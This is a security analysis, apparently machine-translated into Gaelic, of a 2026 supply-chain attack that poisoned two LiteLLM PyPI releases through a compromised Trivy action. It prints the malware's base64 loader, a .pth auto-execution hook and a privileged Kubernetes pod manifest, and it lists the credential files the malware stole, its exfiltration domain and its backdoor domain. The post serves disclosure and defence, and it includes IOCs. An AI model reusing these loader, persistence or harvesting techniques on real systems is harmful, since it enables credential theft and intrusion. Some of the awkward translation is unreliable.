Ionnsaigh air Slabhraidh Solarachaidh LiteLLM

Ionnsaigh air Slabhraidh Solarachaidh LiteLLM: Mar a chuir TeamPCP bacadh air bun-structar AI

Carson a tha seo a 'dèiligeadh

Air 24 Màrt 2026, am pasgan Python mòr-chòrdte beag, geata proxy LLM uile-choitcheann air a chleachdadh le mìltean de enterprises gus trafaic a stiùireadh eadar aplacaidean agus solaraichean AI mar OpenAI, Anthropic, Google, agus AWS Bedrock, chaidh a mhilleadh gu sàmhach air PyPI. Chaidh dà dhreach puinnseanta (1.82.7 agus 1.82.8) fhoillseachadh taobh a-staigh 13 mionaidean bho chèile, a’ giùlan luchd ioma-ìre a ghoid teisteanasan, a thug a-mach dìomhaireachdan sgòthan, a sgaoil gu taobhach thar chruinneachaidhean Kubernetes, agus a stàlaich doras cùil maireannach le comasan cur an gnìomh còd iomallach.

Le timcheall air 3.6 millean luchdachadh sìos làitheil agus cleachdadh domhainn thar bun-structar AI dùthchasach don sgòth, tha litellm aig crois-rathaid a h-uile rud a tha luchd-ionnsaigh an latha an-diugh ag iarraidh: iuchraichean API airson gach prìomh sholaraiche AI, teisteanasan IAM sgòthan, dìomhaireachdan Kubernetes, agus iuchraichean SSH.

Ach cha robh an co-rèiteachadh litellm na thachartas iomallach. B’ e toradh a bh’ ann. iomairt còig latha, còig eag-shiostaman le cleasaiche bagairt ris an canar SgiobaPCP, iomairt a phuinnseanaich sganairean tèarainteachd an toiseach (Aqua Trivy, Checkmarx KICS), agus an uairsin chleachd iad an fheadhainn a chaidh a ghoid CI/CD teisteanasan gus sgaoileadh sìos an abhainn a-steach do npm, OpenVSX, agus mu dheireadh PyPI. Rinn na h-ionnsaighearan armachd de na h-innealan fhèin air a bheil buidhnean an urra gus na slabhraidhean solair aca a dhìon.

Tha an ionnsaigh seo a’ riochdachadh atharrachadh mòr ann an iom-fhillteachd bagairtean slabhraidh solair. Tha an dealbhadh ioma-hop, thar-eag-shiostam, a’ cur innealan tèarainteachd ann an cunnart gus luach àrd a ruighinn. Bun-structar AI, a’ nochdadh ìre de phlanadh agus inbheachd obrachaidh a tha a rèir innealan ionnsaigh a tha a’ sìor fhàs nas fhasa a chleachdadh. Chaidh na luchdan pàighidh ath-aithris ann an àm fìor (tha trì atharrachaidhean luchd pàighidh a’ nochdadh anns a’ chòd tùsail, a’ gabhail a-steach dreachan nas tràithe air an deach beachdan a thoirt a-mach), chaidh bun-structar C2 a chlàradh an latha ron ionnsaigh, agus chaidh na raointean às-tharraing a thaghadh gu faiceallach gus bun-structar luchd-reic dligheach aithris. Tha an inneal cruinneachaidh teisteanasan coileanta siostamach, a’ còmhdach 15+ roinnean a’ gabhail a-steach targaidean sònraichte leithid iuchraichean soidhnidh Cardano agus rèiteachaidhean WireGuard, a’ moladh ìre de mhionaideachd a tha a’ comharrachadh leasachadh malware le taic bho AI mar iomadaiche feachd.

Loidhne-tìm

Ceann-latha (UTC) tachartas
Am Màrt 19 Tha TeamPCP a’ dèanamh cron air tagaichean Gnìomh GitHub Aqua Trivy, gan cur nan àite le còd droch-rùnach a bhios a’ teicheadh. CI/CD dìomhaireachdan bho stòran-dàta sìos an abhainn
Am Màrt 21 Tha an co-rèiteachadh a’ leudachadh gu Checkmarx KICS agus AST GitHub Actions a’ cleachdadh dhòighean coltach ris.
22 Màrt, 06:35 Bidh BerriAI a’ foillseachadh litellm 1.82.6 (dreach glan mu dheireadh) tro àbhaist CI/CD pipeline a bhios a’ cleachdadh Trivy airson sganadh tèarainteachd
Am Màrt 23 Bidh TeamPCP a’ clàradh models.litellm.cloud (àrainn exfiltration). A’ dèanamh cron air 66+ pasgan npm agus leudachaidhean OpenVSX.
24 Màrt, 10:39 litellm 1.82.7 air fhoillseachadh gu PyPI -- luchd air a stealladh a-steach proxy_server.py aig raon a’ mhodail. A’ ruith nuair a thèid a thoirt a-steach
24 Màrt, 10:52 litellm 1.82.8 air fhoillseachadh 13 mionaidean an dèidh sin -- a’ cur ris litellm_init.pth, dubhan rèiteachaidh slighe Python a bhios ag obair air gach tòiseachadh eadar-theangair Python, chan e dìreach in-mhalairt litellm. A’ sealltainn ath-aithris luath luchd-pàighidh
24 Màrt, ~16:00 Bidh PyPI a’ toirt air falbh an dà dhreach às dèidh aithisgean coimhearsnachd. Thèid dreachan a dhubhadh às gu tur (gun an toirt air falbh) bhon chlàr-amais, ged a tha tarballs CDN fhathast ruigsinneach.

Uinneag nochdaidh: timcheall air 5.5 uairean. Rè na h-ùine seo, gin pip install litellm, pip install --upgrade litellm, no CI/CD pipeline Bhiodh tarraing an dreach as ùire air an luchd a chur an gnìomh.

Mar a fhuair am Malware a-steach: An Co-rèiteachadh Eas-chruthach

Cha deach am pasgan litellm a bhriseadh gu dìreach. Ràinig an ionnsaighear e tro ionnsaigh slabhraidh solair dà-hop:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

LiteLLM's CI/CD pipeline chleachd iad Trivy mar sganair tèarainteachd — b’ e an inneal fhèin a chaidh a dhealbhadh gus so-leòntachdan a ghlacadh an vectar ionnsaigh. Leis gun robh an pipeline air iomradh a thoirt air Trivy le taga atharraichte seach taga prìneichte commit SHA, ruith an gnìomh a chaidh a mhilleadh gu fèin-ghluasadach. Ghoid an gnìomh Trivy droch-rùnach dìomhaireachdan na h-àrainneachd, a’ gabhail a-steach an PYPI_PUBLISH comharra, a’ toirt cothrom foillseachaidh dìreach do TeamPCP air pròiseact litellm PyPI.

Tha an ro-innleachd seo “cuir dragh air na geàrdan” na chomharradh air iomairt TeamPCP. Le bhith ag amas air innealan tèarainteachd an toiseach (Trivy, Checkmarx KICS), chuir na h-ionnsaighearan bacadh air lorg aig an aon àm agus fhuair iad cothrom prìomhach air slabhraidhean solair sìos an abhainn.

Mion-sgrùdadh Teicnigeach: An t-Uallach Pàighidh

Puingean In-stealladh

Version 1.82.7 — Cur an gnìomh aig ìre modúl ann an litellm/proxy/proxy_server.py (loidhne 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

Tha an còd seo suidhichte aig raon a’ mhodail eadar litireil faclair agus an tè thùsail showwarning() gnìomh. Bidh e a’ ruith sa bhad nuair a litellm.proxy.proxy_server air a thoirt a-steach — a thachras air cleachdadh sam bith de ghnìomhachd proxy litellm.

Version 1.82.8 — Air a chur ris litellm_init.pth (Faidhle rèiteachaidh slighe Python):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python .pth faidhlichean ann site-packages/ air an giullachd air gach tòiseachadh eadar-theangair ach dìreach loidhnichean a’ tòiseachadh le import air an cur an gnìomh mar chòd. Bidh an t-ionnsaighear a’ gabhail brath air seo le bhith a’ ceangal an luchd gu lèir ri aon import aithris: import os, subprocess, sys; subprocess.Popen(...)Tha seo fada nas ionnsaigheach na an in-stealladh proxy_server.py — bidh e a’ losgadh eadhon ged nach tèid litellm a thoirt a-steach a-riamh, air gach cur air bhog pròiseas Python. pyproject.toml chaidh atharrachadh gus am faidhle seo a thoirt a-steach don sgaoileadh:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

Mar sin tha dreach 1.82.8 aig dà shlighe cur gu bàs neo-eisimeileach: an in-stealladh proxy_server.py (a’ losgadh nuair a thèid proxy a thoirt a-steach bho litellm) agus am faidhle .pth (a’ losgadh nuair a thòisicheas Python sam bith). Tha an ath-fhillteachd fhèin cudromach - tha e a’ dìon an aghaidh lorg no toirt air falbh aon seach aon shlighe leotha fhèin. Tha an àrdachadh bho àm in-mhalairt gu cur an gnìomh aig àm tòiseachaidh dìreach 13 mionaidean an dèidh 1.82.7 a’ moladh gun robh an ionnsaighear a’ cumail sùil air soirbheachas an cleachdaidh agus ag ath-aithris gu luath.

Ìre 1: Cruinneachadh Teisteanasan Coileanta

Tha an sgriobt a-staigh a chaidh a dhì-chòdachadh na fhalamh teisteanas mionaideach. Bidh e a’ cleachdadh os.walk()glob.glob()subprocess.check_output(), agus leughaidhean faidhle dìreach gus an siostam gu lèir a sguabadh:

Roinn-seòrsa Targaidean
Ath-sgrùdadh siostam hostname, whoami, uname -a, ip addr, printenv, ip route
SSH ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, configiuchraichean aoigheachd bho /etc/ssh/
Nèul (AWS) ~/.aws/credentials, ~/.aws/configTeisteanasan dreuchd IMDS tro 169.254.169.254Manaidsear Dhìomhaireachdan ListSecrets; SSM DescribeParameters
Nèul (GCP) ~/.config/gcloud/ (ath-chuairteach); $GOOGLE_APPLICATION_CREDENTIALS
Nèul (Azure) ~/.azure/ (ath-chuairteach); caochladairean àrainneachd
Kubernetes Comharran cunntais seirbheis; ca.crt; àite-ainmean; kubectl get secrets --all-namespacesa h-uile dìomhaireachd tro API K8s
Faidhlichean àrainneachd .env, .env.local, .env.production, .env.development, .env.staging — rannsaich e gu ath-chuairteach (doimhneachd 6) tarsainn /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
Comharran pacaid ~/.npmrc, ~/.vault-token, ~/.netrc
stòr-dàta ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, Rèiteachaidhean MongoDB
TLS / SSL Iuchraichean prìobhaideach bho /etc/ssl/private/, Crioptaich sinn teisteanasan, uile .pem/.key/.p12/.pfx faidhlichean
dhol ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
Wallets crypto Bitcoin, stòr-iuchrach Ethereum, paidhrichean iuchrach Solana (dearbhaidh, bhòt, geall, faucet), iuchraichean soidhnidh Cardano, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero
Eachdraidh nan Sligean .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
Ùghdarras siostaim /etc/passwd, /etc/shadow, logaichean dearbhaidh (seiseanan SSH ris an gabhar)
Iuchraichean Webhook/API Grep airson lìon Slackhooks, Lìon Discordhooks, iuchraichean/dìomhaireachdan API ann am faidhlichean rèiteachaidh
VPN Rèiteachaidhean WireGuard bho /etc/wireguard/

Tha raon-obrach an inneal-buain seo làn-eòlais. Chan e a-mhàin teisteanasan sgòthan a tha e ag amas air ach cuideachd sporanan airgead didseatach, faclan-faire stòr-dàta, rèiteachaidhean VPN, agus CI/CD dìomhaireachdan — a’ moladh gu bheil an ionnsaighear an dùil airgead a dhèanamh bho shiostaman a tha air an lagachadh thar iomadh vectar.

Ìre 2: Gluasad crioptaichte

Tha dàta a chaidh a ghoid air a chrioptachadh agus air a thoirt a-mach le bhith a’ cleachdadh sgeama crioptachaidh measgaichte:

  • AES-256-CBC crioptachadh a h-uile dàta a chaidh a chruinneachadh le iuchair seisein 32-byte air thuaiream (tro openssl enc)
  • RSA-4096 crioptachadh iuchair an t-seisein a’ cleachdadh iuchair phoblach leabaithe an ionnsaighear (lìonadh OAEP, tro openssl pkeyutl)
  • An dà fhaidhle teacsa-crioptaichte air am pasgadh mar tpcp.tar.gz (a ' tpcp ro-leasachan — “TeamPCP” — a’ nochdadh gu cunbhalach air feadh na h-iomairt)
  • POST HTTPS gu https://models.litellm.cloud/ le Content-Type: application/octet-stream

An àrainn models.litellm.cloud chaidh a chlàradh air 23 Màrt - aon latha ron ionnsaigh - agus tha e air a dhealbhadh gus measgachadh le bun-structar litellm dligheach (tha am pròiseact fìor a’ cleachdadh litellm.aiIs dòcha nach comharraich eadhon neach-dìon a tha mothachail air lìonra a bhios ag ath-sgrùdadh trafaic a-mach trafaic chun na tha coltach ri ceann-uidhe modail litellm fhèin.

Ìre 3: Cùl-doras Maireannach (sysmon.py)

Bidh an luchd-pàighidh a’ stàladh doras cùil bhòtaidh air a chleith mar theileaméadrachd siostaim:

  • Slighe~/.config/sysmon/sysmon.py
  • seirbheissysmon.service (aonad cleachdaiche systemd, air a mhìneachadh mar “Seirbheis Telemetry an t-Siostaim”)
  • GiùlanÀs dèidh cadal tùsail 300-diog, cunntasan-bheachd https://checkmarx.zone/raw gach ~50 mionaid
  • bàsLuchdaichidh e sìos an URL a thilleas an C2 gu /tmp/pglog, ga shuidheachadh mar rud a ghabhas ruith (chmod 755), ga ruith ann an seisean neo-cheangailte
  • Tracadh stàite/tmp/.pg_state a’ cur casg air an aon luchd a luchdachadh sìos a-rithist
  • FuasgladhRestart=alwaysRestartSec=10 — a’ mairsinn tubaistean agus ath-thòiseachadh

An àrainn checkmarx.zone 'S e typosquat de Checkmarx (a' chompanaidh tèarainteachd aig) a th' ann checkmarx.com), air a dhealbhadh gus am faiceadh luchd-anailis SOC a bha a’ dèanamh ath-sgrùdadh air logaichean lìonra trafaic gu na tha coltach ri solaraiche tèarainteachd dligheach. Tha seo na dhòigh-obrach seachnaidh a dh’aona ghnothach a tha a rèir ro-innleachd nas fharsainge TeamPCP a bhith a’ falach air cùl branndadh solaraiche tèarainteachd.

Ìre 3b: Gluasad Taobhach Kubernetes

Ma tha teisteanasan cunntas seirbheis Kubernetes aig an t-siostam a tha air a mhilleadh, bidh am malware a’ clàradh a h-uile nod cruinneachaidh agus ga chur an gnìomh. pods sochaireil do gach aon:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

Gach pod:

  • A’ ruith mar sochair le hostPIDhostNetwork, agus làn ruigsinneachd air siostam faidhlichean an aoigh
  • feuman chroot /host an aon rud a stàladh sysmon.py doras cùil air siostam faidhlichean freumhach an aoigh
  • Clàraidh e mar sheirbheis systemd, a’ dèanamh cinnteach gu bheil am buan-sheasmhachd beò às dèidh cuir às don pod
  • ainmeachadh node-setup-* Anns a’ kube-system àite-ainmean gus nochdadh mar bhun-structar cruinneachaidh dligheach

Tha seo a’ ciallachadh aon neach air a cho-rèiteachadh CI/CD dh’ fhaodadh ruitheadair le ruigsinneachd K8s leantainn gu bhith a’ dol tro chùl-doras air gach nód sa chruinneachadh — suidheachadh gluasaid taobhach tubaisteach airson buidhnean a bhios a’ ruith litellm mar neach-ionaid ann an Kubernetes.

Mean-fhàs Luchd-pàighidh (Caochlaidhean air an cur às le beachdan)

Tha dà atharrachadh luchd-cleachdaidh na bu tràithe air an deach beachdan a thoirt a-mach anns a’ chòd tùsail aig loidhnichean 131-132, a’ nochdadh pròiseas leasachaidh an ionnsaighear:

  • Na trì caochlaidhean uile an aon bhun-structar às-shìolaidh a cho-roinn (models.litellm.cloud), iuchair phoblach RSA-4096, pasgan crioptachaidh measgaichte AES-256-CBC + RSA, agus tpcp.tar.gz ainmeachadh pasgan
  • Caochlaidhean nas tràithe chuir e ris Sreath crioptachaidh RC4 taobh a-staigh sgriobt cruinneachaidh dàta, a’ crioptachadh dàta a chaidh a bhuain ron phasgan AES+RSA a-muigh. Chaidh an luchd gnìomhach (loidhne 130) a dhèanamh nas sìmplidhe le bhith a’ toirt air falbh an sreath RC4 a-staigh seo.
  • Bidh na caochlaidhean nas tràithe a’ cleachdadh exec() le StringIO glacadh gus an neach-cruinneachaidh a ruith sa phròiseas, fhad ‘s a bhios an luchd gnìomhach a’ cleachdadh subprocess.run() le ath-stiùireadh stdout — dealachadh nas glaine a sheachnas truailleadh a’ phròiseas aoigheachd
  • Tha na trì caochlaidhean uile ag amas air na h-aon roinnean teisteanas agus slighean cruinneachaidh
  • B’ e masladh brosnachail a bh’ anns an iuchair RC4 anns na dreachan tràtha, a rèir giùlan sireadh aire an actair air Telegram.

Tha seo a’ nochdadh leasachadh gnìomhach rè na h-obrach. Rinn an t-ionnsaighear an cruach crioptachaidh nas sìmplidhe agus leasaich e aonaranachd cur an gnìomh fhad ’s a bha e a’ cumail nan targaidean cruinneachaidh agus am bun-structar às-tharraing seasmhach.

Comharran Co-rèiteachaidh (IOCan)

lìonra

comharra Type adhbhar
models.litellm.cloud Domain Ceann-uidhe às-shìoladh (HTTPS POST)
checkmarx.zone Domain Ceann-uidhe bhòtaidh C2 (HTTPS GET /raw)

Nota: Ceanglaichean aithris taobh a-muigh checkmarx.zone/static/checkmarx-util-1.0.4.tgz chun ìre KICS na bu tràithe de iomairt TeamPCP. Cha deach an URL seo a lorg anns na luchdan litellm a chaidh an sgrùdadh an seo.

Hashes Pacaid

File SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

Siostam an fhaidhle

comharra Type adhbhar
~/.config/sysmon/sysmon.py File Sgriobt cùl-dorais maireannach
~/.config/systemd/user/sysmon.service File Aonad buan-sheasmhachd systemd
/tmp/pglog File Luchdaich sìos binary an dàrna ìre
/tmp/.pg_state File Tracadh staid C2
litellm_init.pth in site-packages/ File Dubhan tòiseachaidh Python (v1.82.8 a-mhàin)
tpcp.tar.gz File Pasgan crioptaichte às-shìolaidh

Kubernetes

comharra Type adhbhar
node-setup-* pods a-steach kube-system Pod Podan gluasaid taobhach sochairichte
sysmon.service air nódan cruinneachaidh seirbheis Buan-sheasmhachd ìre an aoigh tro theicheadh ​​pod

Crioptagrafach

comharra Fiosrachadh
Iuchair phoblach RSA-4096 an ionnsaighear Lorg-meòir SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8Air a ghabhail a-steach anns na trì caochlaidhean luchd; an aon iuchair air aithris thar obrachaidhean TeamPCP eile
tpcp ro-leasachan ann an artaifeactan Co-chruinneachadh ainmeachaidh pasgan (tpcp.tar.gz) cunbhalach air feadh an iomairt

Cur an cèill: Sgioba PCP

Tha an cleasaiche bagairt air cùl na h-iomairt seo air a leantainn mar SgiobaPCP, ris an canar cuideachd PCPcat, Persy_PCP, ShellForce, agus DeadCatx3.

Feartan aithnichte:

  • A’ cumail suas seanalan Telegram aig @Persy_PCP agus @teampcp far an do rinn iad tàir air companaidhean tèarainteachd
  • Ag obair thar iomadh eag-shiostam (GitHub Actions, PyPI, npm, OpenVSX)
  • A’ cleachdadh raointean typosquat sònraichte do luchd-reic airson gach ìre den iomairt (me, checkmarx.zone airson Checkmarx, models.litellm.cloud airson litellm)
  • Comharran bun-structair cunbhalach: an aon phàir iuchrach RSA, tpcp.tar.gz gnàthas ainmeachaidh, tpcp-docs-* Stòran-tasgaidh GitHub air an cleachdadh mar àrd-ùrlar dead-drop
  • A’ targaideadh innealan tèarainteachd mar phuingean inntrigidh gu slabhraidhean solair sìos an abhainn

Misneachd ann an cur às lethÀrd. An iuchair phoblach RSA co-roinnte, tpcp Tha ainmeachadh stuthan-ealain, for-chòmhdach bun-structair C2, agus astar obrachaidh thar na h-iomairt còig latha a’ ceangal gu làidir na co-rèiteachaidhean Trivy, KICS, npm, OpenVSX, agus litellm ris an aon chleasaiche.

Adhbharan: Dualtach ionmhais (goid wallet crypto, monetization teisteanas sgòthan) còmhla ri droch chliù (Telegram a’ magadh). Tha farsaingeachd buain teisteanasan - bho AWS IAM gu paidhrichean iuchair dearbhaidh Solana gu rèiteachaidhean WireGuard - a’ moladh cleasaiche le brosnachadh ionmhais a tha a’ sireadh an ROI as motha fhaighinn bho gach co-rèiteachadh.

Cobhair AI a dh’fhaodadh a bhith annTha an inneal-buain teisteanasan siostamach coileanta - 15+ roinnean a’ gabhail a-steach targaidean sònraichte leithid iuchraichean soidhnidh Cardano, rèiteachaidhean WireGuard, agus teisteanasan Kaniko Docker - ann an dòigh a tha a rèir àireamhachd le taic AI. Tha astar ath-aithris luchd (trì atharrachaidhean le sgeamaichean crioptachaidh eadar-dhealaichte), co-òrdanachadh thar-eag-shiostam (5 eag-shiostaman ann an 5 latha), agus OPSEC obrachaidh (àrainnean a tha ag atharrais air solaraiche, crioptachadh measgaichte, buanseasmhachd siostam falaichte mar theileaméadrachd) a’ moladh ìre de thoradh a dh’ fhaodadh a bhith a’ nochdadh leasachadh le taic AI mar iomadaiche feachd. Tha am measadh seo tuairmeasach; dh’ fhaodadh luchd-obrachaidh sgileil raon coltach ris a choileanadh às aonais innealan AI.

TTPan agus Dòighean-obrach Ùra

1. Puinnseanachadh Slabhraidh Solarachaidh Innealan Tèarainteachd (caochladh T1195.002)

Tha cunnart ùr ann a bhith a’ cur sganairean tèarainteachd (Trivy, KICS) an sàs mar chiad cheum gus targaidean sìos an abhainn a ruighinn. Cha do chuir an ionnsaighear bacadh air leabharlann a-mhàin - chuir iad bacadh air na h-innealan a bhios buidhnean a’ cleachdadh gus… lorg leabharlannan air an cunnart. Cruthaichidh seo dall-phuing: is e an sganair a bu chòir an còd droch-rùnach a ghlacadh fhèin an dòigh lìbhrigidh.

2 Python .pth Buanachadh Faidhle (T1546)

Tha litellm_init.pth Tha an dòigh-obrach ann an v1.82.8 gu sònraichte seòlta. .pth faidhlichean ann site-packages/ air an giullachd air gach tòiseachadh eadar-theangair; loidhne sam bith a thòisicheas le import air a chur an gnìomh mar chòd. Le bhith a’ ceangal an luchd ri aon import aithris, bidh an t-ionnsaighear a’ coileanadh gach pròiseas Python - chan ann a-mhàin nuair a thèid litellm a thoirt a-steach. Tha seo a’ ciallachadh gu bheil an luchd a’ losgadh eadhon ged a tha litellm air a stàladh ach nach tèid a chleachdadh a-riamh, agus mairidh e leigheas a chuireas an àite a tha air a mhilleadh. .py faidhlichean gun sgrùdadh a dhèanamh orra .pth faidhlichean.

3. Gluasad Taobhach air Feadh a’ Chruinneachaidh Kubernetes tro Leasachadh Pod Prìobhaideach (T1610, T1611)

Cruthachadh fèin-ghluasadach pods sochairichte air gach nód cruinneachaidh - le hostPIDhostNetwork, stàladh siostam faidhlichean aoigheachd, agus chroot gus buanseasmhachd a stàladh — slabhraidhean cleachdadh container (T1610) le teicheadh ​​​​​​gu aoigh (T1611) gus aon luchd-obrach a chaidh a mhilleadh a thionndadh gu bhith na làn mhilleadh cruinneachadh.

4. Bun-structar C2 a tha ag atharrais air solaraiche

cleachdadh models.litellm.cloud (a’ dèanamh atharrais air litellm) agus checkmarx.zone (a’ dèanamh atharrais air Checkmarx) mar chrìoch-phuingean C2/exfil air a dhealbhadh gus sgrùdadh lìonra a sheachnadh. Chì luchd-anailis SOC a bhios a’ sgrùdadh trafaic egress ceanglaichean HTTPS ri na tha coltach ri raointean reiceadair dligheach.

5. Ath-aithris Luath air Luchd-pàighidh san Itealan

Nuair a thèid v1.82.7 fhoillseachadh le cur an gnìomh aig àm in-mhalairt, agus an uair sin v1.82.8 le cur an gnìomh aig àm tòiseachaidh 13 mionaidean às dèidh sin, chithear an ionnsaighear a’ cumail sùil air agus ag atharrachadh ann an àm fìor. Tha na caochlaidhean luchd-cleachdaidh le beachdan (le sgeamaichean crioptachaidh eadar-dhealaichte) a tha air an gleidheadh ​​anns a’ chòd tùsail a’ dearbhadh leasachadh gnìomhach rè na h-obrach.

Dè a ghabhas dèanamh

Bidh an ionnsaigh seo a’ gabhail brath air earbsa aig gach ìre: earbsa ann an innealan tèarainteachd, earbsa ann an clàran phasgan, earbsa ann an raointean a tha coltach ri daoine, earbsa ann an CI/CD fèin-ghluasad. Feumaidh dìon na aghaidh gach aon de na crìochan earbsa seo a bhith air a neartachadh:

Airson Luchd-cleachdaidh Pacaid

  • Prìne eisimeileachdan a rèir hash, chan ann a-mhàin an dreach. pip install litellm==1.82.6 --hash=sha256:... bhiodh e air casg a chur air na dreachan a chaidh a cho-rèiteachadh a bhith air an stàladh eadhon ged a nochd iad airson ùine ghoirid mar an dreach as ùire.
  • Cleachd faidhlichean glasaidh. pip-compilepoetry.lock, agus uv.lock glac dreachan agus hashes ceart. CI/CD bu chòir a stàladh bho fhaidhlichean glasaidh, chan ann bho shònrachaidhean dreach fleòdraidh.
  • Cumail sùil airson .pth faidhlichean. Dèan sgrùdadh cunbhalach site-packages/ airson ris nach robh dùil .pth faidhlichean — bidh iad ag obair air gach tòiseachadh Python agus tha iad nan dòigh-obrach buanachaidh nach eil air a mheas gu leòr.
  • Cuir smachdan lìonra fàgail an gnìomh. An t-eisireachadh gu models.litellm.cloud agus bhòtadh C2 gu checkmarx.zone dh’ fhaodadh gun deach a ghlacadh le sìoladh egress stèidhichte air liosta cheadaichte ann an àrainneachdan riochdachaidh.

Airson Luchd-gleidhidh Phacaidean

  • pin CI/CD gnìomhan le commit SHA, chan e tag. LiteLLM's pipeline chleachd e Trivy gun dreach prìneichte. Nam biodh e air iomradh a thoirt air aquasecurity/trivy-action@<commit-sha> an àite @latest, cha bhiodh an gnìomh a chaidh a cho-rèiteachadh air a chur an gnìomh.
  • Cleachd comharran foillseachaidh geàrr-ùine, le raon sònraichte. Tha PyPI a’ toirt taic do Fhoillsichearan Earbsach (stèidhichte air OIDC) agus comharran API le raon. An fheadhainn a chaidh a thoirt a-mach às an lìon. PYPI_PUBLISH cha bu chòir gum biodh cothrom foillseachaidh fad-ùine, gun bhacadh aig an tòcan.
  • Cuir dearbhadh dà-fhactar an comas air PyPI. Feumaidh 2FA a bhith ann airson a h-uile neach-gleidhidh agus cleachd iuchraichean tèarainteachd bathar-cruaidh far a bheil sin comasach.
  • Cuir ainm ri pacaidean. Leigidh teisteanasan Sigstore/PEP 740 le luchd-cleachdaidh dearbhadh gun deach pasgan a thogail a rèir an dùil. CI/CD pipeline, chan ann le ionnsaighear le comharra goidte.

Airson Luchd-obrachaidh Àrd-ùrlair (PyPI, npm, GitHub)

  • Lorg pàtrain foillseachaidh neo-àbhaisteach. Bu chòir dà dhreach ùr a chaidh fhoillseachadh 13 mionaidean bho chèile, bho IP no comharra eadar-dhealaichte bhon àbhaist, gleidheadh ​​airson ath-sgrùdadh no sganadh fèin-ghluasadach a bhrosnachadh mus tèid am pasgan a stàladh.
  • Luathaich gabhail ri Foillsichearan Earbsach. Bidh foillseachadh stèidhichte air OIDC a’ ceangal phasganan ri stòran-dàta agus sruthan-obrach sònraichte, a’ dèanamh comharran goidte gun fheum taobh a-muigh an fhear thùsail. CI/CD co-theacsa.
  • Cuir sganadh malware an gnìomh aig àm foillseachaidh. Bhiodh e comasach an luchd dì-chòdaichte le base64 ann am proxy_server.py a lorg le mion-sgrùdadh statach aig àm foillseachaidh.

Airson an Eag-shiostaim

  • Làimhsich innealan tèarainteachd mar bhun-structar èiginneach. Tha milleanan de dhaoine a’ cleachdadh Trivy agus Checkmarx KICS. pipelineBu chòir na Gnìomhan GitHub aca a bhith air an soidhnigeadh, air am prìneadh, agus air an sgrùdadh leis an aon dian ris na pacaidean a bhios iad a’ sganadh.
  • Tasgadh ann an lorg rè ùine. Chan urrainn dha mion-sgrùdadh statach leis fhèin a h-uile dòigh-obrach doilleir a ghlacadh. Sgrùdadh rè-ùine air stàladh pacaid hooks, ceanglaichean lìonra ris nach robh dùil, agus pàtrain ruigsinneachd faidhle amharasach a’ toirt seachad dìon domhainn.
  • Roinn fiosrachadh mu bhagairtean nas luaithe. Dh’ fhaodadh an uinneag nochdaidh 5.5-uair airson litellm a bhith nas giorra le co-òrdanachadh thar-reiceadair nas luaithe. Lorg seirbheisean sganaidh fèin-ghluasadach mar Xygeni MEW, Socket, agus Snyk an ana-cainnt - is e dearbhadh daonna agus ùine freagairt clàraidh am bacadh.

Co-dhùnadh

Tha iomairt TeamPCP na àm cudromach dha software supply chain securityLe bhith a’ cur sganairean tèarainteachd an sàs an toiseach agus gan cleachdadh mar cheumannan gu bun-structar AI àrd-luachmhor, sheall an luchd-ionnsaigh nach eil an t-sèine solair ach cho làidir ris an eisimeileachd thar-ghluasadach as laige aice, agus gum faodadh an eisimeileachd sin a bhith mar an inneal tèarainteachd anns a bheil earbsa agad gus do chumail sàbhailte.

Tha an co-rèiteachadh litellm gu sònraichte a’ cur cuideam air a’ chunnart a tha a’ sìor fhàs do bhun-structar AI. Mar a bhios geataichean proxy LLM a’ fàs mar an fheadhainn as cudromaiche standard pàtran airson enterprise Le bhith a’ cleachdadh AI, bidh iad a’ cur ruigsinneachd gu iuchraichean API, teisteanasan sgòthan, agus dàta mothachail ann an aon phàirt. Tha a bhith a’ cur bacadh air a’ phàirt sin na phrìomh iuchair don chruach AI gu lèir.

Bu chòir do bhuidhnean a stàlaich litellm 1.82.7 no 1.82.8 rè na h-uinneige 5.5-uair a thìde seo a làimhseachadh mar cho-rèiteachadh teisteanas iomlan: rothlaich a h-uile dìomhaireachd air siostaman air a bheil buaidh, dèan sgrùdadh air cruinneachaidhean Kubernetes airson node-setup-* pods a-steach kube-system, thoir air falbh gin sam bith sysmon.service aonadan systemd, agus thoir sùil airson litellm_init.pth ann am Python site-packages/ clàran-stiùiridh. Luchd-cleachdaidh ìomhaigh oifigeil Docker (ghcr.io/berriai/litellm) cha deach buaidh a thoirt orra, leis gun do phrìnich an ìomhaigh a cuid eisimeileachd agus cha deach ath-thogail rè na h-uinneige nochdaidh.

Mun Author

Co-stèidheadair & CTO

